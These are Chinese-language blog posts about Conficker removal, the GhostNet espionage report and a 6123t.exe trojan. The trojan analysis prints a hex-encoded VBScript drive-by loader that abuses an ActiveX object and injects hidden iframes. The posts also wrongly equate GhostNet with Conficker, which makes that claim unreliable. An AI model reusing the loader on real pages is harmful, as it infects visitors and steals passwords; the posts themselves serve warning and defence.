2009年4月14日星期二

如何移除Conflicker (DownAdup)病毒?


在前面文章已經報導過GhostNet病毒的威力, 這個病毒又稱Conflicker或Downadup, 其變種成多種不同型態的惡性病毒, 會竊取機密資料並遙控受害電腦, 萬一中毒應如何解除呢?

如果你的電腦無法連上各種防毒公司網站或Microsoft Update, 那就肯定中毒了, 以下是解毒方式:

先解除被斷線的問題

(1) 由開始->執行->輸入cmd 按Enter進到DOS模式
(2) 輸入指令 net stop dnscache , 按下Enter
(3) 關閉DOS模式
這時應該已經可以連到防毒軟體公司

然後下載解毒軟體

http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/d.exe

關閉所有執行中的程式或視窗, 並確定你的電腦沒有自動回朔設定

執行解毒軟體

解完後會有報告產生

重新開機

更新Microsoft Patch MS08-067 (或整個Microsoft Update)

當然最後要把所有在該電腦用過的帳密都更改

標籤: , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2009年3月30日星期一

GhostNet : 鬼網網路如何傳播與可能的影響



如上圖顯示亞洲地區已經成為GhostNet的最大溫床, 並且台灣已經是GhostNet的最大受害區域, 根據各方訊息尚無法證實是否中國政府與GhostNet有關

來自F-Secure的這份資料, 解釋了GhostNet如何散佈, 這份GhostNet Q&A也說明了一些常見的問題

如何成為GhostNet的目標?

(1)收到造假的電子郵件, 並且來自信任的對象
(2)從電子郵件談論的內容無法判斷信件真假
(3)電子郵件會附上檔案(PDF/DOC/PPT/XLS)
(4)檔案開啟也沒有發現任何異常

但是你已經被GhostNet植入木馬程式, 尤其政府單位或NGO最可能成為GhostNet的目標

其他Peer-to-Peer的方式亦可成為散佈的管道, 目前只有Windows使用者會受到GhostNet的影響, 並且電腦表面上不會有任何的異狀, 這個GhostNet病毒為Downadup/Conficker及其變種, 這個"Worm:W32/Downadup.DY"也有詳細資料

如何知道是否受到GhostNet的影響呢? 最簡單的方式是看你能不能連上一些掃毒網站, 如果都沒有問題就可能比較安全

如果發現無法連上某些知名掃毒站台, 你可以用另外電腦去F-Secure下載掃毒, 由於避免反而因掃毒而中獎, 這裡就不提供連結, 就請你的電腦廠商去處理

這個GhostNet不是愚人節的遊戲, 由於受害者多為政府單位, 可能會洩露許多敏感的資料, 進而威脅到政府運作, 因此必須正視這個問題

相關重要訊息
http://www.f-secure.com/weblog/archives/00001637.html
http://isc.sans.org/diary.html
http://www.f-secure.com/weblog/archives/00001636.html
http://lastwatchdog.com/evolution-conficker-globe-spanning-worm/

2009/03/31 補記:

如何保障不在此波GhostNet成為受害者?
這裡有幾項簡單作業

(1)如果你是windows用戶,請更新windows patch
(2)設定windows為自動更新
(3)更新掃毒病毒碼


如果你的windows update原本為自動, 但莫名被改為取消或手動
如果你無法更新病毒碼, 就很可能是GhostNet(Downadup/Conficker)的對像

舉手之勞以保障電腦安全吧!

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

GhostNet : 台灣的網路正曝露在危險中



這則訊息是昨天由英國國家廣播的網頁得知, "Major cyber spy network uncovered", 但是目前在台灣的各媒體均未看到詳細報導 ...

Yahoo!Kimo由紐約時報取得訊息"紐約時報:加拿大研究員發現大型電腦間諜網絡":

(路透華盛頓28日電)「紐約時報」(New YorkTimes)今天報導,加拿大研究員發現一個龐大的電腦間諜作業系統,可以滲入全球政府和私人企業電腦竊取資料。被竊的對象包括達賴喇嘛的資料在內。

多倫多的蒙克國際研究中心 (Munk Center forInternational Studies)發現,過去兩年,全球至少有103個國家的1295台電腦被這套間諜系統入侵,研究團隊稱之為「鬼網」 (GhostNet)。

過去就曾發現電腦間諜行動的研究員說,各國大使館、外交部、政府機關以及達賴喇嘛位於印度、布魯塞爾、倫敦和紐約的流亡藏人中心,都是「鬼網」滲透的對象。

但是他們沒發現任何美國政府部門被「鬼網」入侵的證據。中央社(翻譯)


但是沒有說明最上圖的資料, 該圖的資料顯示台灣被感染148個主機, 為全球這波受害之冠, 再仔細閱讀內容, 以下為受害的例子


台灣史瓦濟蘭大使館
台灣資策會
台灣Net Trade
中華民國對外貿易發展協會
台灣TGSN政府網路


(資料來源 : Tracking GhostNet: Investigating a Cyber Espionage Network)

資料是由Information Warfare Monitor (IWM)經過十個月的研究所提出的報告, IWM是SecDev Group與Munk Centre for International Studies的研究學者組成

台灣的媒體報導說: "各國大使館、外交部、政府機關以及達賴喇嘛位於印度、布魯塞爾、倫敦和紐約的流亡藏人中心,都是「鬼網」滲透的對象...但是他們沒發現任何美國政府部門被「鬼網」入侵的證據"

該報導說 : "多倫多的蒙克國際研究中心 (Munk Center forInternational Studies)發現,過去兩年,全球至少有103個國家的1295台電腦被這套間諜系統入侵,研究團隊稱之為「鬼網」 (GhostNet)"


可是卻沒閱讀報告的內容, 台灣幾處重要的貿易及政府網路已經在GhostNet的嚴重侵害中...


後記 (2009/3/31) :

http://news.pchome.com.tw/science/ithome/20090331/index-12384539272178952005.html

各網路訊息已經開始於今天陸續出現
但是卻有烏龍翻譯

以上來自ithome,pchome的訊息說

"該機構所條列出的電腦中,屬台灣的機構有:史瓦濟蘭大史館(高機密),資策會(III,低機密),Net Trade(高機密),外貿協會(高機密),以及政府服務網(高機密),其中單外貿協會就有79個。"


英文原文並非什麼高機密,低機密
而是指High/Medium/Low Confident...高度確定, 中度確定, 低度確定, 也就是指研究結果的信心指數(Confidence)

瓦濟蘭大史館(H)表示高度確定所偵測到的電腦是瓦濟蘭大史館所屬電腦

資策會(L)表示因為DNS解析下因為有些不確定因素 (例如資策會有多個domain, 但ip class可能同一個, 或domain為資策會所有, 但ip class非登記為資策會.....等不確定因素, 故不能高度確定是資策會所屬電腦, 如果由國內研究人員來判讀就知道是否為資策會所屬)

新聞翻譯成高機密,低機密...是有點離譜

如果立委拿這個去說...哇...高機密被偷啦....那會鬧笑話的

其實不管高/中/低度確定, 其實都一樣被感染了, 跟感染的嚴重性或被偷資料嚴重性都無關...都一樣嚴重

特此解釋, 希望不要以訛傳訛了

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月30日星期五

6123t.EXE病毒

近日瀏覽網頁時, 突然ZoneAlarm跳出一個視窗, 詢問是否執行6123t.exe? 當然當下馬上將此程式阻擋, 很難想像如果沒有防火牆的話, 不知又要造成什麼損失 ...

該檔案存在C:\目錄下

檔案名稱 : 6123t.exe
檔案大小 : 13840 byte
檔案類型 : MS-DOS executable (EXE), OS/2 or MS Windows

根據初步瞭解, 該檔案為木馬程式, 會偷取硬碟中的資料, 目前所有防毒軟體都沒有相關訊息, 似乎也都無法防堵, 現在中國大陸已經有多起中毒事件

如果您的電腦在C:\下存在6123t.exe, 而您沒有安裝額外防火牆的話, 就可能已經中毒了, 在尚未確認刪除以前, 就暫時拔掉網路線吧 ...

(追蹤報導)

已經查出來源, 該病毒似乎與此次Flash出問題有關, 並且exe檔未必都是6123t

Adobe Flash Player出現漏洞, 在Adobe釋出修補程式前,最好暫時關閉Flash外掛(或更新到最新版)

當網友瀏覽被入侵的網站時, 會執行以下javascript:

Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756
D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622
E5365744174747269627574652022636C6173736964222C2022636C7369643A424
43936433535362D363541332D313144302D393833412D303043303446433239453
336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224
1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756
D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637
56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7
377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746
52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206
865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7
7726974652028223C694672616D65207352633D6E65772E68746D2077696474683
D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090
9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7
02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222
90D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)

這段經Hex2Str後解碼就不列出了, 它會執行
flash.swf
real.htm
new.htm
help.htm

當啟動flash.swf, 會以URLMON.DLL去下載6123t.exe並執行, 執行後便會將卡巴斯基disable, 並解開ow.dll成為keyboard hook dll, 這個dll就可以監聽鍵盤的輸入, 因此該病毒應該是要偷取密碼

目前尚未中毒的電腦, 最好的方式就是先下載Adoble Flash到9.0.124版本, 並隨時注意Adobe新聞以更新flash的patch

由於被植入惡意程式的網站會越來越多, 預計災情會持續發燒

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院